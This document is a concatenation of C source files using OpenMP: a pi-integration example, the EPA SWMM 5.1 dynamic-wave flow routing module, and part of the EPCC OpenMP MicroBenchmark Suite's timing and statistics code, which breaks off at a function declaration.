// f is the integrand 4/(1+x^2); its integral over [0,1] equals pi.
// (The original file only declared f; a definition is supplied here so the
// program links stand-alone -- an assumption about the original f.)
double f( double x )
{
return 4.0 / (1.0 + x*x);
}
double clock_it(void)
{
double duration = 0.0;
struct timeval start;
gettimeofday(&start, NULL);
duration = (double)(start.tv_sec + start.tv_usec/1000000.0);
return duration;
}
int main(void)
{
double sum, pi, x, h;
double start_time, stop_time;
int i;
h = (double)1.0/(double)N;
sum = 0.0;
start_time = clock_it();
#ifdef _OPENMP
#pragma omp parallel for private(x) reduction(+:sum)
#endif
for ( i=0; i<N ; i++ ){
x = h*((double)i + 0.5); // midpoint of the i-th subinterval
sum = sum + f(x);
}
stop_time = clock_it();
// print value of pi to verify the computation
pi = h*sum;
printf(" pi is approximately : %12.9f \n", pi);
// print elapsed time
printf("Elapsed time = %lf seconds\n",(stop_time - start_time));
return 0;
}
|
dynwave.c | //-----------------------------------------------------------------------------
// dynwave.c
//
// Project: EPA SWMM5
// Version: 5.1
// Date: 03/20/14 (5.1.001)
// 03/28/14 (5.1.002)
// 09/15/14 (5.1.007)
// 03/19/15 (5.1.008)
// 08/01/16 (5.1.011)
// Author: L. Rossman (EPA)
// M. Tryby (EPA)
// R. Dickinson (CDM)
//
// Dynamic wave flow routing functions.
//
// This module solves the dynamic wave flow routing equations using
// Picard Iterations (i.e., a method of successive approximations)
// to solve the explicit form of the continuity and momentum equations
// for conduits.
//
// Build 5.1.002:
// - Only non-ponded nodal surface area is saved for use in
// surcharge algorithm.
//
// Build 5.1.007:
// - Node losses added to node outflow variable instead of treated
// as a separate item when computing change in node flow volume.
//
// Build 5.1.008:
// - Module-specific constants moved here from project.c.
// - Support added for user-specified minimum variable time step.
// - Node crown elevations found here instead of in flowrout.c module.
// - OpenMP use to parallelize findLinkFlows() & findNodeDepths().
// - Bug in finding complete list of capacity limited links fixed.
//
// Build 5.1.011:
// - Added test for failed memory allocation.
// - Fixed illegal array index bug for Ideal Pumps.
//
//-----------------------------------------------------------------------------
#define _CRT_SECURE_NO_DEPRECATE
#include "headers.h"
#include <stdlib.h>
#include <math.h>
#if defined(_OPENMP)
#include <omp.h> //(5.1.008)
#endif
//-----------------------------------------------------------------------------
// Constants
//-----------------------------------------------------------------------------
static const double MINTIMESTEP = 0.001; // min. time step (sec) //(5.1.008)
static const double OMEGA = 0.5; // under-relaxation parameter
// Constants moved here from project.c // //(5.1.008)
const double DEFAULT_SURFAREA = 12.566; // Min. nodal surface area (~4 ft diam.)
const double DEFAULT_HEADTOL = 0.005; // Default head tolerance (ft)
const int DEFAULT_MAXTRIALS = 8; // Max. trials per time step
//-----------------------------------------------------------------------------
// Data Structures
//-----------------------------------------------------------------------------
typedef struct
{
char converged; // TRUE if iterations for a node done
double newSurfArea; // current surface area (ft2)
double oldSurfArea; // previous surface area (ft2)
double sumdqdh; // sum of dqdh from adjoining links
double dYdT; // change in depth w.r.t. time (ft/sec)
} TXnode;
//-----------------------------------------------------------------------------
// Shared Variables
//-----------------------------------------------------------------------------
static double VariableStep; // size of variable time step (sec)
static TXnode* Xnode; // extended nodal information
static double Omega; // actual under-relaxation parameter
static int Steps; // number of Picard iterations
//-----------------------------------------------------------------------------
// Function declarations
//-----------------------------------------------------------------------------
static void initRoutingStep(void);
static void initNodeStates(void);
static void findBypassedLinks();
static void findLimitedLinks();
static void findLinkFlows(double dt);
static int isTrueConduit(int link);
static void findNonConduitFlow(int link, double dt);
static void findNonConduitSurfArea(int link);
static double getModPumpFlow(int link, double q, double dt);
static void updateNodeFlows(int link);
static int findNodeDepths(double dt);
static void setNodeDepth(int node, double dt);
static double getFloodedDepth(int node, int canPond, double dV, double yNew,
double yMax, double dt);
static double getVariableStep(double maxStep);
static double getLinkStep(double tMin, int *minLink);
static double getNodeStep(double tMin, int *minNode);
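//=============================================================================
// Illustrative sketch (not part of SWMM): the module header describes the
// solver as Picard iteration -- repeated under-relaxed substitution
//     xNew = (1 - omega)*xOld + omega*g(xOld)
// applied until successive estimates agree within a tolerance. The helper
// below shows the scheme in isolation; its name and signature are
// hypothetical and it is not called by the routing code.
static double picardIterate(double (*g)(double), double x0, double omega,
                            double tol, int maxTrials)
{
    int k;
    double x = x0;
    for (k = 0; k < maxTrials; k++)
    {
        double xNew = (1.0 - omega) * x + omega * g(x);
        if ( fabs(xNew - x) <= tol ) return xNew;      // converged
        x = xNew;
    }
    return x;                                          // best estimate so far
}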
//=============================================================================
//// This function was modified for release 5.1.008. //// //(5.1.008)
void dynwave_init()
//
// Input: none
// Output: none
// Purpose: initializes dynamic wave routing method.
//
{
int i, j;
double z;
VariableStep = 0.0;
Xnode = (TXnode *) calloc(Nobjects[NODE], sizeof(TXnode));
//// Added to release 5.1.011. //// //(5.1.011)
if ( Xnode == NULL )
{
report_writeErrorMsg(ERR_MEMORY,
" Not enough memory for dynamic wave routing.");
return;
}
//////////////////////////////////////
// --- initialize node surface areas & crown elev.
for (i = 0; i < Nobjects[NODE]; i++ )
{
Xnode[i].newSurfArea = 0.0;
Xnode[i].oldSurfArea = 0.0;
Node[i].crownElev = Node[i].invertElev;
}
// --- update node crown elev. & initialize links
for (i = 0; i < Nobjects[LINK]; i++)
{
j = Link[i].node1;
z = Node[j].invertElev + Link[i].offset1 + Link[i].xsect.yFull;
Node[j].crownElev = MAX(Node[j].crownElev, z);
j = Link[i].node2;
z = Node[j].invertElev + Link[i].offset2 + Link[i].xsect.yFull;
Node[j].crownElev = MAX(Node[j].crownElev, z);
Link[i].flowClass = DRY;
Link[i].dqdh = 0.0;
}
}
//=============================================================================
void dynwave_close()
//
// Input: none
// Output: none
// Purpose: frees memory allocated for dynamic wave routing method.
//
{
FREE(Xnode);
}
//=============================================================================
//// New function added to release 5.1.008. //// //(5.1.008)
void dynwave_validate()
//
// Input: none
// Output: none
// Purpose: adjusts dynamic wave routing options.
//
{
if ( MinRouteStep > RouteStep ) MinRouteStep = RouteStep;
if ( MinRouteStep < MINTIMESTEP ) MinRouteStep = MINTIMESTEP;
if ( MinSurfArea == 0.0 ) MinSurfArea = DEFAULT_SURFAREA;
else MinSurfArea /= UCF(LENGTH) * UCF(LENGTH);
if ( HeadTol == 0.0 ) HeadTol = DEFAULT_HEADTOL;
else HeadTol /= UCF(LENGTH);
if ( MaxTrials == 0 ) MaxTrials = DEFAULT_MAXTRIALS;
}
//=============================================================================
double dynwave_getRoutingStep(double fixedStep)
//
// Input: fixedStep = user-supplied fixed time step (sec)
// Output: returns routing time step (sec)
// Purpose: computes variable routing time step if applicable.
//
{
// --- use user-supplied fixed step if variable step option turned off
// or if it's smaller than the min. allowable variable time step
if ( CourantFactor == 0.0 ) return fixedStep;
if ( fixedStep < MINTIMESTEP ) return fixedStep;
// --- at start of simulation (when current variable step is zero)
// use the minimum allowable time step
if ( VariableStep == 0.0 )
{
VariableStep = MinRouteStep; //(5.1.008)
}
// --- otherwise compute variable step based on current flow solution
else VariableStep = getVariableStep(fixedStep);
// --- adjust step to be a multiple of a millisecond
VariableStep = floor(1000.0 * VariableStep) / 1000.0;
return VariableStep;
}
//=============================================================================
int dynwave_execute(double tStep)
//
// Input:   tStep = time step (sec)
// Output: returns number of iterations used
// Purpose: routes flows through drainage network over current time step.
//
{
int converged;
// --- initialize
if ( ErrorCode ) return 0;
Steps = 0;
converged = FALSE;
Omega = OMEGA;
initRoutingStep();
// --- keep iterating until convergence
while ( Steps < MaxTrials )
{
// --- execute a routing step & check for nodal convergence
initNodeStates();
findLinkFlows(tStep);
converged = findNodeDepths(tStep);
Steps++;
if ( Steps > 1 )
{
if ( converged ) break;
// --- check if link calculations can be skipped in next step
findBypassedLinks();
}
}
if ( !converged ) NonConvergeCount++;
// --- identify any capacity-limited conduits
findLimitedLinks();
return Steps;
}
//=============================================================================
void initRoutingStep()
{
int i;
for (i = 0; i < Nobjects[NODE]; i++)
{
Xnode[i].converged = FALSE;
Xnode[i].dYdT = 0.0;
}
for (i = 0; i < Nobjects[LINK]; i++)
{
Link[i].bypassed = FALSE;
Link[i].surfArea1 = 0.0;
Link[i].surfArea2 = 0.0;
}
// --- a2 preserves conduit area from solution at last time step
for ( i = 0; i < Nlinks[CONDUIT]; i++) Conduit[i].a2 = Conduit[i].a1;
}
//=============================================================================
void initNodeStates()
//
// Input: none
// Output: none
// Purpose: initializes node's surface area, inflow & outflow
//
{
int i;
for (i = 0; i < Nobjects[NODE]; i++)
{
// --- initialize nodal surface area
if ( AllowPonding )
{
Xnode[i].newSurfArea = node_getPondedArea(i, Node[i].newDepth);
}
else
{
Xnode[i].newSurfArea = node_getSurfArea(i, Node[i].newDepth);
}
if ( Xnode[i].newSurfArea < MinSurfArea )
{
Xnode[i].newSurfArea = MinSurfArea;
}
//// Following code section modified for release 5.1.007 //// //(5.1.007)
// --- initialize nodal inflow & outflow
Node[i].inflow = 0.0;
Node[i].outflow = Node[i].losses;
if ( Node[i].newLatFlow >= 0.0 )
{
Node[i].inflow += Node[i].newLatFlow;
}
else
{
Node[i].outflow -= Node[i].newLatFlow;
}
Xnode[i].sumdqdh = 0.0;
}
}
//=============================================================================
void findBypassedLinks()
{
int i;
for (i = 0; i < Nobjects[LINK]; i++)
{
if ( Xnode[Link[i].node1].converged &&
Xnode[Link[i].node2].converged )
Link[i].bypassed = TRUE;
else Link[i].bypassed = FALSE;
}
}
//=============================================================================
void findLimitedLinks()
//
// Input: none
// Output: none
// Purpose: determines if a conduit link is capacity limited.
//
{
int j, n1, n2, k;
double h1, h2;
for (j = 0; j < Nobjects[LINK]; j++)
{
// ---- check only non-dummy conduit links
if ( !isTrueConduit(j) ) continue; //(5.1.008)
// --- check that upstream end is full
k = Link[j].subIndex;
Conduit[k].capacityLimited = FALSE;
if ( Conduit[k].a1 >= Link[j].xsect.aFull )
{
// --- check if HGL slope > conduit slope
n1 = Link[j].node1;
n2 = Link[j].node2;
h1 = Node[n1].newDepth + Node[n1].invertElev;
h2 = Node[n2].newDepth + Node[n2].invertElev;
if ( (h1 - h2) > fabs(Conduit[k].slope) * Conduit[k].length )
Conduit[k].capacityLimited = TRUE;
}
}
}
//=============================================================================
void findLinkFlows(double dt)
{
int i;
// --- find new flow in each non-dummy conduit
#pragma omp parallel num_threads(NumThreads) //(5.1.008)
{
#pragma omp for //(5.1.008)
for ( i = 0; i < Nobjects[LINK]; i++)
{
if ( isTrueConduit(i) && !Link[i].bypassed )
dwflow_findConduitFlow(i, Steps, Omega, dt);
}
}
// --- update inflow/outflows for nodes attached to non-dummy conduits
for ( i = 0; i < Nobjects[LINK]; i++)
{
if ( isTrueConduit(i) ) updateNodeFlows(i);
}
// --- find new flows for all dummy conduits, pumps & regulators
for ( i = 0; i < Nobjects[LINK]; i++)
{
if ( !isTrueConduit(i) )
{
if ( !Link[i].bypassed ) findNonConduitFlow(i, dt);
updateNodeFlows(i);
}
}
}
//=============================================================================
int isTrueConduit(int j)
{
return ( Link[j].type == CONDUIT && Link[j].xsect.type != DUMMY );
}
//=============================================================================
void findNonConduitFlow(int i, double dt)
//
// Input: i = link index
// dt = time step (sec)
// Output: none
// Purpose: finds new flow in a non-conduit-type link
//
{
double qLast; // previous link flow (cfs)
double qNew; // new link flow (cfs)
// --- get link flow from last iteration
qLast = Link[i].newFlow;
Link[i].dqdh = 0.0;
// --- get new inflow to link from its upstream node
// (link_getInflow returns 0 if flap gate closed or pump is offline)
qNew = link_getInflow(i);
if ( Link[i].type == PUMP ) qNew = getModPumpFlow(i, qNew, dt);
// --- find surface area at each end of link
findNonConduitSurfArea(i);
// --- apply under-relaxation with flow from previous iteration;
// --- do not allow flow to change direction without first being 0
if ( Steps > 0 && Link[i].type != PUMP )
{
qNew = (1.0 - Omega) * qLast + Omega * qNew;
if ( qNew * qLast < 0.0 ) qNew = 0.001 * SGN(qNew);
}
Link[i].newFlow = qNew;
}
//=============================================================================
double getModPumpFlow(int i, double q, double dt)
//
// Input: i = link index
// q = pump flow from pump curve (cfs)
// dt = time step (sec)
// Output: returns modified pump flow rate (cfs)
// Purpose: modifies pump curve pumping rate depending on amount of water
// available at pump's inlet node.
//
{
int j = Link[i].node1; // pump's inlet node index
int k = Link[i].subIndex; // pump's index
double newNetInflow; // inflow - outflow rate (cfs)
double netFlowVolume; // inflow - outflow volume (ft3)
double y; // node depth (ft)
if ( q == 0.0 ) return q;
// --- case where inlet node is a storage node:
// prevent node volume from going negative
if ( Node[j].type == STORAGE ) return node_getMaxOutflow(j, q, dt);
// --- case where inlet is a non-storage node
switch ( Pump[k].type )
{
// --- for Type1 pump, a volume is computed for inlet node,
// so make sure it doesn't go negative
case TYPE1_PUMP:
return node_getMaxOutflow(j, q, dt);
// --- for other types of pumps, if pumping rate would make depth
// at upstream node negative, then set pumping rate = inflow
case TYPE2_PUMP:
case TYPE4_PUMP:
case TYPE3_PUMP:
newNetInflow = Node[j].inflow - Node[j].outflow - q;
netFlowVolume = 0.5 * (Node[j].oldNetInflow + newNetInflow ) * dt;
y = Node[j].oldDepth + netFlowVolume / Xnode[j].newSurfArea;
if ( y <= 0.0 ) return Node[j].inflow;
}
return q;
}
//=============================================================================
void findNonConduitSurfArea(int i)
//
// Input: i = link index
// Output: none
// Purpose: finds the surface area contributed by a non-conduit
// link to its upstream and downstream nodes.
//
{
if ( Link[i].type == ORIFICE )
{
Link[i].surfArea1 = Orifice[Link[i].subIndex].surfArea / 2.;
}
// --- no surface area for weirs to maintain SWMM 4 compatibility
/*
else if ( Link[i].type == WEIR )
{
Xlink[i].surfArea1 = Weir[Link[i].subIndex].surfArea / 2.;
}
*/
else Link[i].surfArea1 = 0.0;
Link[i].surfArea2 = Link[i].surfArea1;
if ( Link[i].flowClass == UP_CRITICAL ||
Node[Link[i].node1].type == STORAGE ) Link[i].surfArea1 = 0.0;
if ( Link[i].flowClass == DN_CRITICAL ||
Node[Link[i].node2].type == STORAGE ) Link[i].surfArea2 = 0.0;
}
//=============================================================================
void updateNodeFlows(int i)
//
// Input:   i = link index
// Output: none
// Purpose: updates cumulative inflow & outflow at link's end nodes.
//
{
int k; //(5.1.011)
int barrels = 1;
int n1 = Link[i].node1;
int n2 = Link[i].node2;
double q = Link[i].newFlow;
double uniformLossRate = 0.0;
// --- compute any uniform seepage loss from a conduit
if ( Link[i].type == CONDUIT )
{
k = Link[i].subIndex;
uniformLossRate = Conduit[k].evapLossRate + Conduit[k].seepLossRate;
barrels = Conduit[k].barrels;
}
// --- update total inflow & outflow at upstream/downstream nodes
if ( q >= 0.0 )
{
Node[n1].outflow += q + uniformLossRate;
Node[n2].inflow += q;
}
else
{
Node[n1].inflow -= q;
Node[n2].outflow -= q - uniformLossRate;
}
// --- add surf. area contributions to upstream/downstream nodes
Xnode[n1].newSurfArea += Link[i].surfArea1 * barrels;
Xnode[n2].newSurfArea += Link[i].surfArea2 * barrels;
// --- update summed value of dqdh at each end node
Xnode[n1].sumdqdh += Link[i].dqdh;
if ( Link[i].type == PUMP )
{
k = Link[i].subIndex;
if ( Pump[k].type != TYPE4_PUMP ) //(5.1.011)
{
Xnode[n2].sumdqdh += Link[i].dqdh;
}
}
else Xnode[n2].sumdqdh += Link[i].dqdh;
}
//=============================================================================
int findNodeDepths(double dt)
{
int i;
int converged; // convergence flag
double yOld; // previous node depth (ft)
// --- compute outfall depths based on flow in connecting link
for ( i = 0; i < Nobjects[LINK]; i++ ) link_setOutfallDepth(i);
// --- compute new depth for all non-outfall nodes and determine if
// depth change from previous iteration is below tolerance
converged = TRUE;
#pragma omp parallel num_threads(NumThreads) //(5.1.008)
{
#pragma omp for private(yOld) //(5.1.008)
for ( i = 0; i < Nobjects[NODE]; i++ )
{
if ( Node[i].type == OUTFALL ) continue;
yOld = Node[i].newDepth;
setNodeDepth(i, dt);
Xnode[i].converged = TRUE;
if ( fabs(yOld - Node[i].newDepth) > HeadTol )
{
converged = FALSE;
Xnode[i].converged = FALSE;
}
}
} //(5.1.008)
return converged;
}
//=============================================================================
void setNodeDepth(int i, double dt)
//
// Input: i = node index
// dt = time step (sec)
// Output: none
// Purpose: sets depth at non-outfall node after current time step.
//
{
int canPond; // TRUE if node can pond overflows
int isPonded; // TRUE if node is currently ponded
double dQ; // inflow minus outflow at node (cfs)
double dV; // change in node volume (ft3)
double dy; // change in node depth (ft)
double yMax; // max. depth at node (ft)
double yOld; // node depth at previous time step (ft)
double yLast; // previous node depth (ft)
double yNew; // new node depth (ft)
double yCrown; // depth to node crown (ft)
double surfArea; // node surface area (ft2)
double denom; // denominator term
double corr; // correction factor
double f; // relative surcharge depth
// --- see if node can pond water above it
canPond = (AllowPonding && Node[i].pondedArea > 0.0);
isPonded = (canPond && Node[i].newDepth > Node[i].fullDepth);
// --- initialize values
yCrown = Node[i].crownElev - Node[i].invertElev;
yOld = Node[i].oldDepth;
yLast = Node[i].newDepth;
Node[i].overflow = 0.0;
surfArea = Xnode[i].newSurfArea;
// --- determine average net flow volume into node over the time step
dQ = Node[i].inflow - Node[i].outflow;
dV = 0.5 * (Node[i].oldNetInflow + dQ) * dt;
// --- if node not surcharged, base depth change on surface area
if ( yLast <= yCrown || Node[i].type == STORAGE || isPonded )
{
dy = dV / surfArea;
yNew = yOld + dy;
// --- save non-ponded surface area for use in surcharge algorithm //(5.1.002)
if ( !isPonded ) Xnode[i].oldSurfArea = surfArea; //(5.1.002)
// --- apply under-relaxation to new depth estimate
if ( Steps > 0 )
{
yNew = (1.0 - Omega) * yLast + Omega * yNew;
}
// --- don't allow a ponded node to drop much below full depth
if ( isPonded && yNew < Node[i].fullDepth )
yNew = Node[i].fullDepth - FUDGE;
}
// --- if node surcharged, base depth change on dqdh
// NOTE: depth change is w.r.t depth from previous
// iteration; also, do not apply under-relaxation.
else
{
// --- apply correction factor for upstream terminal nodes
corr = 1.0;
if ( Node[i].degree < 0 ) corr = 0.6;
// --- allow surface area from last non-surcharged condition
// to influence dqdh if depth close to crown depth
denom = Xnode[i].sumdqdh;
if ( yLast < 1.25 * yCrown )
{
f = (yLast - yCrown) / yCrown;
denom += (Xnode[i].oldSurfArea/dt -
Xnode[i].sumdqdh) * exp(-15.0 * f);
}
// --- compute new estimate of node depth
if ( denom == 0.0 ) dy = 0.0;
else dy = corr * dQ / denom;
yNew = yLast + dy;
if ( yNew < yCrown ) yNew = yCrown - FUDGE;
// --- don't allow a newly ponded node to rise much above full depth
if ( canPond && yNew > Node[i].fullDepth )
yNew = Node[i].fullDepth + FUDGE;
}
// --- depth cannot be negative
if ( yNew < 0 ) yNew = 0.0;
// --- determine max. non-flooded depth
yMax = Node[i].fullDepth;
if ( canPond == FALSE ) yMax += Node[i].surDepth;
// --- find flooded depth & volume
if ( yNew > yMax )
{
yNew = getFloodedDepth(i, canPond, dV, yNew, yMax, dt);
}
else Node[i].newVolume = node_getVolume(i, yNew);
// --- compute change in depth w.r.t. time
Xnode[i].dYdT = fabs(yNew - yOld) / dt;
// --- save new depth for node
Node[i].newDepth = yNew;
}
//=============================================================================
double getFloodedDepth(int i, int canPond, double dV, double yNew,
double yMax, double dt)
//
// Input: i = node index
// canPond = TRUE if water can pond over node
// dV = change in volume over time step (ft3)
// yNew = current depth at node (ft)
// yMax = max. depth at node before ponding (ft)
// dt = time step (sec)
// Output: returns depth at node when flooded (ft)
// Purpose: computes depth, volume and overflow for a flooded node.
//
{
if ( canPond == FALSE )
{
Node[i].overflow = dV / dt;
Node[i].newVolume = Node[i].fullVolume;
yNew = yMax;
}
else
{
Node[i].newVolume = MAX((Node[i].oldVolume+dV), Node[i].fullVolume);
Node[i].overflow = (Node[i].newVolume -
MAX(Node[i].oldVolume, Node[i].fullVolume)) / dt;
}
if ( Node[i].overflow < FUDGE ) Node[i].overflow = 0.0;
return yNew;
}
//=============================================================================
double getVariableStep(double maxStep)
//
// Input: maxStep = user-supplied max. time step (sec)
// Output: returns time step (sec)
// Purpose: finds time step that satisfies stability criterion but
// is no greater than the user-supplied max. time step.
//
{
int minLink = -1; // index of link w/ min. time step
int minNode = -1; // index of node w/ min. time step
double tMin; // allowable time step (sec)
double tMinLink; // allowable time step for links (sec)
double tMinNode; // allowable time step for nodes (sec)
// --- find stable time step for links & then nodes
tMin = maxStep;
tMinLink = getLinkStep(tMin, &minLink);
tMinNode = getNodeStep(tMinLink, &minNode);
// --- use smaller of the link and node time step
tMin = tMinLink;
if ( tMinNode < tMin )
{
tMin = tMinNode ;
minLink = -1;
}
// --- update count of times the minimum node or link was critical
stats_updateCriticalTimeCount(minNode, minLink);
// --- don't let time step go below an absolute minimum
if ( tMin < MinRouteStep ) tMin = MinRouteStep; //(5.1.008)
return tMin;
}
//=============================================================================
double getLinkStep(double tMin, int *minLink)
//
// Input: tMin = critical time step found so far (sec)
// Output: minLink = index of link with critical time step;
// returns critical time step (sec)
// Purpose: finds critical time step for conduits based on Courant criterion.
//
{
int i; // link index
int k; // conduit index
double q; // conduit flow (cfs)
double t; // time step (sec)
double tLink = tMin; // critical link time step (sec)
// --- examine each conduit link
for ( i = 0; i < Nobjects[LINK]; i++ )
{
if ( Link[i].type == CONDUIT )
{
// --- skip conduits with negligible flow, area or Fr
k = Link[i].subIndex;
q = fabs(Link[i].newFlow) / Conduit[k].barrels;
if ( q <= 0.05 * Link[i].qFull
|| Conduit[k].a1 <= FUDGE
|| Link[i].froude <= 0.01
) continue;
// --- compute time step to satisfy Courant condition
t = Link[i].newVolume / Conduit[k].barrels / q;
t = t * Conduit[k].modLength / link_getLength(i);
t = t * Link[i].froude / (1.0 + Link[i].froude) * CourantFactor;
// --- update critical link time step
if ( t < tLink )
{
tLink = t;
*minLink = i;
}
}
}
return tLink;
}
//=============================================================================
double getNodeStep(double tMin, int *minNode)
//
// Input: tMin = critical time step found so far (sec)
// Output: minNode = index of node with critical time step;
// returns critical time step (sec)
// Purpose: finds critical time step for nodes based on max. allowable
// projected change in depth.
//
{
int i; // node index
double maxDepth; // max. depth allowed at node (ft)
double dYdT; // change in depth per unit time (ft/sec)
double t1; // time needed to reach depth limit (sec)
double tNode = tMin; // critical node time step (sec)
// --- find smallest time so that estimated change in nodal depth
// does not exceed safety factor * maxdepth
for ( i = 0; i < Nobjects[NODE]; i++ )
{
// --- see if node can be skipped
if ( Node[i].type == OUTFALL ) continue;
if ( Node[i].newDepth <= FUDGE) continue;
if ( Node[i].newDepth + FUDGE >=
Node[i].crownElev - Node[i].invertElev ) continue;
// --- define max. allowable depth change using crown elevation
maxDepth = (Node[i].crownElev - Node[i].invertElev) * 0.25;
if ( maxDepth < FUDGE ) continue;
dYdT = Xnode[i].dYdT;
if (dYdT < FUDGE ) continue;
// --- compute time to reach max. depth & compare with critical time
t1 = maxDepth / dYdT;
if ( t1 < tNode )
{
tNode = t1;
*minNode = i;
}
}
return tNode;
}
|
common.c | /****************************************************************************
* *
* OpenMP MicroBenchmark Suite - Version 3.1 *
* *
* produced by *
* *
* Mark Bull, Fiona Reid and Nix Mc Donnell *
* *
* at *
* *
* Edinburgh Parallel Computing Centre *
* *
* email: markb@epcc.ed.ac.uk or fiona@epcc.ed.ac.uk *
* *
* *
* This version copyright (c) The University of Edinburgh, 2015. *
* *
* *
* Licensed under the Apache License, Version 2.0 (the "License"); *
* you may not use this file except in compliance with the License. *
* You may obtain a copy of the License at *
* *
* http://www.apache.org/licenses/LICENSE-2.0 *
* *
* Unless required by applicable law or agreed to in writing, software *
* distributed under the License is distributed on an "AS IS" BASIS, *
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. *
* See the License for the specific language governing permissions and *
* limitations under the License. *
* *
****************************************************************************/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <math.h>
#include <omp.h>
#include <xray.h>
#include "common.h"
#define CONF95 1.96 // z-value bounding 95% of a normal distribution
int nthreads = -1; // Number of OpenMP threads
int delaylength = -1; // The number of iterations to delay for
int outerreps = -1; // Outer repetitions
double delaytime = -1.0; // Length of time to delay for in microseconds
double targettesttime = 0.0; // The length of time in microseconds that the test
// should run for.
unsigned long innerreps; // Inner repetitions
double *times; // Array of doubles storing the benchmark times in microseconds
double referencetime; // The average reference time in microseconds to perform
// outerreps runs
double referencesd; // The standard deviation in the reference time in
// microseconds for outerreps runs.
double testtime; // The average test time in microseconds for
// outerreps runs
double testsd; // The standard deviation in the test time in
// microseconds for outerreps runs.
void usage(char *argv[]) {
printf("Usage: %s.x \n"
"\t--outer-repetitions <outer-repetitions> (default %d)\n"
"\t--test-time <target-test-time> (default %0.2f microseconds)\n"
"\t--delay-time <delay-time> (default %0.4f microseconds)\n"
"\t--delay-length <delay-length> "
"(default auto-generated based on processor speed)\n",
argv[0],
DEFAULT_OUTER_REPS, DEFAULT_TEST_TARGET_TIME, DEFAULT_DELAY_TIME);
}
void parse_args(int argc, char *argv[]) {
// Parse the parameters
int arg;
for (arg = 1; arg < argc; arg++) {
if (strcmp(argv[arg], "--delay-time") == 0.0) {
delaytime = atof(argv[++arg]);
if (delaytime == 0.0) {
printf("Invalid float:--delay-time: %s\n", argv[arg]);
usage(argv);
exit(EXIT_FAILURE);
}
} else if (strcmp(argv[arg], "--outer-repetitions") == 0) {
outerreps = atoi(argv[++arg]);
if (outerreps == 0) {
printf("Invalid integer:--outer-repetitions: %s\n", argv[arg]);
usage(argv);
exit(EXIT_FAILURE);
}
} else if (strcmp(argv[arg], "--test-time") == 0) {
targettesttime = atof(argv[++arg]);
if (targettesttime == 0) {
printf("Invalid integer:--test-time: %s\n", argv[arg]);
usage(argv);
exit(EXIT_FAILURE);
}
} else if (strcmp(argv[arg], "-h") == 0) {
usage(argv);
exit(EXIT_SUCCESS);
} else {
printf("Invalid parameters: %s\n", argv[arg]);
usage(argv);
exit(EXIT_FAILURE);
}
}
}
int getdelaylengthfromtime(double delaytime) {
int i, reps;
double lapsedtime, starttime; // seconds
reps = 1000;
lapsedtime = 0.0;
delaytime = delaytime/1.0E6; // convert from microseconds to seconds
// Note: delaytime is local to this function and thus the conversion
// does not propagate to the main code.
// Here we want to use the delaytime in microseconds to find the
// delaylength in iterations. We start with delaylength=0 and
// increase until we get a large enough delaytime, return delaylength
// in iterations.
delaylength = 0;
delay(delaylength);
while (lapsedtime < delaytime) {
delaylength = delaylength * 1.1 + 1;
starttime = getclock();
for (i = 0; i < reps; i++) {
delay(delaylength);
}
lapsedtime = (getclock() - starttime) / (double) reps;
}
return delaylength;
}
unsigned long getinnerreps(void (*test)(void)) {
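// Grow innerreps geometrically until one timed call to test() takes at
// least targettesttime microseconds; bail out if the compiler appears to
// have optimised the timed loop away.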
innerreps = 10L; // some initial value
double time = 0.0;
while (time < targettesttime) {
double start = getclock();
test();
time = (getclock() - start) * 1.0e6;
innerreps *=2;
// Test to stop code if compiler is optimising reference time expressions away
if (innerreps > (targettesttime*1.0e15)) {
printf("Compiler has optimised reference loop away, STOP! \n");
printf("Try recompiling with lower optimisation level \n");
exit(1);
}
}
return innerreps;
}
void printheader(char *name) {
printf("\n");
printf("--------------------------------------------------------\n");
printf("Computing %s time using %lu reps\n", name, innerreps);
}
void stats(double *mtp, double *sdp) {
double meantime, totaltime, sumsq, mintime, maxtime, sd, cutoff;
int i, nr;
mintime = 1.0e10;
maxtime = 0.;
totaltime = 0.;
for (i = 1; i <= outerreps; i++) {
mintime = (mintime < times[i]) ? mintime : times[i];
maxtime = (maxtime > times[i]) ? maxtime : times[i];
totaltime += times[i];
}
meantime = totaltime / outerreps;
sumsq = 0;
for (i = 1; i <= outerreps; i++) {
sumsq += (times[i] - meantime) * (times[i] - meantime);
}
sd = sqrt(sumsq / (outerreps - 1));
cutoff = 3.0 * sd;
nr = 0;
for (i = 1; i <= outerreps; i++) {
if (fabs(times[i] - meantime) > cutoff)
nr++;
}
printf("\n");
printf("Sample_size Average Min Max S.D. Outliers\n");
printf(" %d %f %f %f %f %d\n",
outerreps, meantime, mintime, maxtime, sd, nr);
printf("\n");
*mtp = meantime;
*sdp = sd;
}
void printfooter(char *name, double testtime, double testsd,
double referencetime, double refsd) {
printf("%s time = %f microseconds +/- %f\n",
name, testtime, CONF95*testsd);
printf("%s overhead = %f microseconds +/- %f\n",
name, testtime-referencetime, CONF95*(testsd+referencesd));
}
void printreferencefooter(char *name, double referencetime, double referencesd) {
printf("%s time = %f microseconds +/- %f\n",
name, referencetime, CONF95 * referencesd);
}
void init(int argc, char **argv)
{
#pragma omp parallel
{
#pragma omp master
{
nthreads = omp_get_num_threads();
}
}
parse_args(argc, argv);
if (outerreps == -1) {
outerreps = DEFAULT_OUTER_REPS;
}
if (targettesttime == 0.0) {
targettesttime = DEFAULT_TEST_TARGET_TIME;
}
if (delaytime == -1.0) {
delaytime = DEFAULT_DELAY_TIME;
}
delaylength = getdelaylengthfromtime(delaytime); // Always need to compute delaylength in iterations
times = malloc((outerreps+1) * sizeof(double));
printf("Running OpenMP benchmark version 3.0\n"
"\t%d thread(s)\n"
"\t%d outer repetitions\n"
"\t%0.2f test time (microseconds)\n"
"\t%d delay length (iterations) \n"
"\t%f delay time (microseconds)\n",
nthreads,
outerreps, targettesttime,
delaylength, delaytime);
}
void finalise(void) {
free(times);
}
void initreference(char *name) {
printheader(name);
}
/* Calculate the reference time. */
void reference(char *name, void (*refer)(void)) {
int k;
double start;
XRayLabelFrame(name);
// Calculate the required number of innerreps
innerreps = getinnerreps(refer);
initreference(name);
for (k = 0; k <= outerreps; k++) {
start = getclock();
refer();
times[k] = (getclock() - start) * 1.0e6 / (double) innerreps;
}
finalisereference(name);
}
void finalisereference(char *name) {
stats(&referencetime, &referencesd);
printreferencefooter(name, referencetime, referencesd);
}
void intitest(char *name) {
printheader(name);
}
void finalisetest(char *name) {
stats(&testtime, &testsd);
printfooter(name, testtime, testsd, referencetime, referencesd);
}
/* Function to run a microbenchmark test*/
void benchmark(char *name, void (*test)(void))
